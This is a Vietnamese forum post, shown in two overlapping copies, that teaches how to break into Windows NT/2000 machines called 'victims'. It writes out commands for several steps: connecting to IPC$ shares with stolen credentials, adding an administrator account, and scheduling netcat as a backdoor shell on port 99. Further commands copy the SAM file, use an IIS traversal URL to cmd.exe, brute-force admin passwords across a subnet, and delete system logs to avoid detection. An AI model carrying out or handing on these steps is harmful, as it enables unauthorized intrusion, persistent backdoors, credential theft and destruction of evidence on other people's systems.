- Tham gia
- 11/11/2008
- Bài viết
- 9.441
Phần 1 : Net
Chỉ cần bạn có được User và Passwords của một IP nào trên Net…thế là bạn có thể kết nối một IPC$ rồi đấy….bây giờ tui xin ví dụ là bạn có được User là hbx và passwords : 123456…IP : 127.0.0.1
Hãy mở trình Ms dos và gõ vào lệnh sau :
để kết nồi một IPC$ với máy victtim, nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dũng
———————————————————————————————–
bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới …
chúng ta cộng thệm môt user mới là heibai và password là lovechina
nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator
—————————————————————————————————-
trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer
Z là của mình…còn C$ là của Victim
——————————————————————————————————-
Phần 2 : AT
thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,….vậy khi copy trojan lên máy rồi…làm thế nào dể khới động nó đây ?
chúng ta phải dùng đến lệnh AT thôi…..
đầu tiên…chúng ta cần biết thời gian của đối phương
bây giờ thì nó sẽ phản hồi thời gian của victim…vd : 12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1
ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi
* giới thiệu chút it về NC…NC là từ viết tắc của NETCAT….nó là một telnet server với port 99
đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút
———————————————————————————————————
Phần 3 : Telnet
đây là một lệnh rất cần thiết khi xâm nhập máy tính…nó có thể kết nối với máy tính khác từ xa..nhưng thường thi phải có ID & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok
thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh…
———————————————————————————————————–
Phần 4 : Copy
bây giờ chúng ta nói tiêp…làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại….nhưng bạn phải có kết nối IPC$ cái đã….
chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
nếu bạn copy lên folder winNt
muốn copy files trên máy victm thì bạn gõ vào :
————————————————————————————————
Phần 5 : Set
nếu bạn muốn ha.ck một website……tất nhiến là phải mở port 80..nếu không thì ha.ck cho ai xem ?
đã tới lúc dùng lệnh Set rồi
sau đây là kết quả mà tớ tìm thấy……chúng ta phân tích nghe….chủ yếu là muốn biết homepage nó ở đâu thôi…..
đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở đâu? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`…..
—————————————————————————————
Phần 6 : Nbtstat
nếu cậu Scan đuợc một máy sữ dụng Winnt…open port 135-139…thế thì bồ phải dùng lệnh này để biết thêm user thôi…
* tiện thể xin nói luôn…đây là netbios….sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi
Nbtstat - A XXX.XXX.XXX.XXX
sau đây là kết quả tớ scan được…..
NetBIOS Remote Machine Name Table
Name Type Status
———————————————
kết quả cho biết User là PENTIUMII。
——————————————————————————————-
Phần 7 : Shutdown
nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt
20 giây sau…Winnt sẽ tự khời động lại…….hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này….vì nó sẽ làm tổn thất rất nặng cho victim…hãy làm tay hacker có đạo đức
———————————————————————————————————————————
Phần 8 : Dir….
lệnh này không có gì để nói hết..chỉ dùng để view thôi……………..
———————————————————————————————–
Phần 9 : Del
lệnh này giống như xoá nhật ký vậy đó…..khi chúng ta xâm nhập máy tình…trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi…chư muốn bị tóm cổ hả ?
sau đây là những files nhật ký của Winnt
chỉ cần del hết là coi như xong
——————————————————————————————————————-
ngoài ra những lệnh trong ms dos còn rất nhiều….như lệnh ECHO …..FTP………ATTRIB……mà ở đây tui không thể kể ra hết đươc
Lấy mật khẩu của WInNT và Win2000
tạo một tệp tin, trong đó có chứa username và password tương ứng nhau . Ví dụ ta tạo 1 file credentials.txt :
……….. …………………
sau đó dùng lệnh FOR trong Windows để dò password admin , cụ thể :
Lệnh này lấy 2 “từ vị” ở mỗi dòng, và lấy “từ vị” đầu cho biến %i (password), và “từ” vị thứ 2 cho biến %j trong khi sử dụng lệnh net use cho resource IPC$, IPC$ ở đây có thể là ổ C$ hay D$, còn tên ổ đĩa bạn nên lấy những ổ “ảo”, nghĩa là không có trên máy ví dụ ổ H: hay I: V:
Lệnh này đã được mình test thành công !
—————————————————————–
Có rất nhiều chương trình để lấy pass theo kiểu chọn này, ở đây ta dùng chương trình NAT (NetBIOS Auditing Tool), chương trình này được sử dụng cho tất cả các PC ở class C :
D:\> FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.202.%I >> nat_output.txt
— Checking host : 192.168.202.1
— Obtaining list of remote NetBIOS names
— Attempting to connect with Username: ‘ADMINISTRATOR’ Password:’ADMINISTRATOR’
— Attempting to connect with Username: ‘ADMINISTRATOR’ Password:’GUEST’
…….
— CONNECTED: Username: ‘ADMINISTRATOR’ Password” ‘PASSWORD’
— Attempting to access share: \\*SMBSERVER\TEMP
— WARNING: Able to acess share: \\*SMBSERVER\TEMP
……
Những thông tin về lệnh FOR bạn có thể tìm hiểu bằng lệnh FOR /?
Một cách khác nhằm đoạt quyền của Administrator ở Window
Đối với Win98 : Không khó lắm , bạn vào start menu –>search–> Files and Folders , bạn tìm tất cả những file *.pwl. Sau đó Xóa những file này đi, khởi động lại máy rồi login với user là administrator , không password
Đối với Win NT, 2000, XP : Cách này tỷ lệ thành công khoảng 60% Bạn chuẩn bị một boot disk Windows 98, sau đó khởi động máy bằng đĩa này, trong DOS bạn đánh : Del X:\winnt\system32\config\SAM với X là ổ đĩa chứa OS của bạn, lệnh này dùng để xoá file SAM chứa những account người dùng ,… Bạn khởi động lại máy và log in với user Administrator , không có pass !
Cách này dùng cho hệ thống cài NTFS (Độ bảo mật cao hơn so với FAT 32), bạn làm lại những bước trên, tuy nhiên, bạn cần một chương trình để đọc file của bạn trong partion ở DOS . Bạn download chương trình NTFSpro Những hướng dẫn trong chương trình này sẽ giúp bạn cài 1 boot disk đúng. Sau khi tạo 1 disk boot với NTFSpro , bạn khởi động lại với boot disk này và đã có thể thao tác với file rùi ! làm theo những bước ở phía trên nữa là xong !
Chỉ cần bạn có được User và Passwords của một IP nào trên Net…thế là bạn có thể kết nối một IPC$ rồi đấy….bây giờ tui xin ví dụ là bạn có được User là hbx và passwords : 123456…IP : 127.0.0.1
Hãy mở trình Ms dos và gõ vào lệnh sau :
Mã:
Net use \\127.0.0.1\ipc$ “123456″ /user:”hbx”
———————————————————————————————–
bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới …
chúng ta cộng thệm môt user mới là heibai và password là lovechina
Mã:
Net user heibai lovechina / add
Mã:
Net Localgroup Adminstrator heibai / add
trong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer
Mã:
Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )
——————————————————————————————————-
Phần 2 : AT
thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,….vậy khi copy trojan lên máy rồi…làm thế nào dể khới động nó đây ?
chúng ta phải dùng đến lệnh AT thôi…..
đầu tiên…chúng ta cần biết thời gian của đối phương
Mã:
Net time \\127.0.0.1
tiếp theo..chúng ta cần tạo môt homework ID = 1
Mã:
AT \\127.0.0.1 12:3 nc.exe
* giới thiệu chút it về NC…NC là từ viết tắc của NETCAT….nó là một telnet server với port 99
đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút
———————————————————————————————————
Phần 3 : Telnet
đây là một lệnh rất cần thiết khi xâm nhập máy tính…nó có thể kết nối với máy tính khác từ xa..nhưng thường thi phải có ID & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok
Mã:
Telnet 127.0.0.1 99
———————————————————————————————————–
Phần 4 : Copy
bây giờ chúng ta nói tiêp…làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại….nhưng bạn phải có kết nối IPC$ cái đã….
chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Mã:
Copy Index.html \\127.0.0.1\C$\index.html
Mã:
Copy index.html \\127.0.0.1\admin$\index.html
Mã:
Copy \\127.0.0.1\Admin$\repair\sam._c:\
Phần 5 : Set
nếu bạn muốn ha.ck một website……tất nhiến là phải mở port 80..nếu không thì ha.ck cho ai xem ?
đã tới lúc dùng lệnh Set rồi
sau đây là kết quả mà tớ tìm thấy……chúng ta phân tích nghe….chủ yếu là muốn biết homepage nó ở đâu thôi…..
Mã:
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
—————————————————————————————
Phần 6 : Nbtstat
nếu cậu Scan đuợc một máy sữ dụng Winnt…open port 135-139…thế thì bồ phải dùng lệnh này để biết thêm user thôi…
* tiện thể xin nói luôn…đây là netbios….sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi
Nbtstat - A XXX.XXX.XXX.XXX
sau đây là kết quả tớ scan được…..
NetBIOS Remote Machine Name Table
Name Type Status
———————————————
Mã:
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII…<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
——————————————————————————————-
Phần 7 : Shutdown
nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt
Mã:
Shutdown \\127.0.0.1 t:20
———————————————————————————————————————————
Phần 8 : Dir….
lệnh này không có gì để nói hết..chỉ dùng để view thôi……………..
———————————————————————————————–
Phần 9 : Del
lệnh này giống như xoá nhật ký vậy đó…..khi chúng ta xâm nhập máy tình…trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi…chư muốn bị tóm cổ hả ?
sau đây là những files nhật ký của Winnt
Mã:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
——————————————————————————————————————-
ngoài ra những lệnh trong ms dos còn rất nhiều….như lệnh ECHO …..FTP………ATTRIB……mà ở đây tui không thể kể ra hết đươc
Lấy mật khẩu của WInNT và Win2000
tạo một tệp tin, trong đó có chứa username và password tương ứng nhau . Ví dụ ta tạo 1 file credentials.txt :
Mã:
[file: credentials.txt]
password username
admin Administrator
administrator Administrator
secret Administrator
sau đó dùng lệnh FOR trong Windows để dò password admin , cụ thể :
Mã:
c:\>FOR /F “tokens=1,2*” %i in (credetials.txt) do net use (tên ổ đĩa): \\server\IPC$ %i /u:%j
Lệnh này đã được mình test thành công !
—————————————————————–
Có rất nhiều chương trình để lấy pass theo kiểu chọn này, ở đây ta dùng chương trình NAT (NetBIOS Auditing Tool), chương trình này được sử dụng cho tất cả các PC ở class C :
D:\> FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.202.%I >> nat_output.txt
— Checking host : 192.168.202.1
— Obtaining list of remote NetBIOS names
— Attempting to connect with Username: ‘ADMINISTRATOR’ Password:’ADMINISTRATOR’
— Attempting to connect with Username: ‘ADMINISTRATOR’ Password:’GUEST’
…….
— CONNECTED: Username: ‘ADMINISTRATOR’ Password” ‘PASSWORD’
— Attempting to access share: \\*SMBSERVER\TEMP
— WARNING: Able to acess share: \\*SMBSERVER\TEMP
……
Những thông tin về lệnh FOR bạn có thể tìm hiểu bằng lệnh FOR /?
Một cách khác nhằm đoạt quyền của Administrator ở Window
Đối với Win98 : Không khó lắm , bạn vào start menu –>search–> Files and Folders , bạn tìm tất cả những file *.pwl. Sau đó Xóa những file này đi, khởi động lại máy rồi login với user là administrator , không password
Đối với Win NT, 2000, XP : Cách này tỷ lệ thành công khoảng 60% Bạn chuẩn bị một boot disk Windows 98, sau đó khởi động máy bằng đĩa này, trong DOS bạn đánh : Del X:\winnt\system32\config\SAM với X là ổ đĩa chứa OS của bạn, lệnh này dùng để xoá file SAM chứa những account người dùng ,… Bạn khởi động lại máy và log in với user Administrator , không có pass !
Cách này dùng cho hệ thống cài NTFS (Độ bảo mật cao hơn so với FAT 32), bạn làm lại những bước trên, tuy nhiên, bạn cần một chương trình để đọc file của bạn trong partion ở DOS . Bạn download chương trình NTFSpro Những hướng dẫn trong chương trình này sẽ giúp bạn cài 1 boot disk đúng. Sau khi tạo 1 disk boot với NTFSpro , bạn khởi động lại với boot disk này và đã có thể thao tác với file rùi ! làm theo những bước ở phía trên nữa là xong !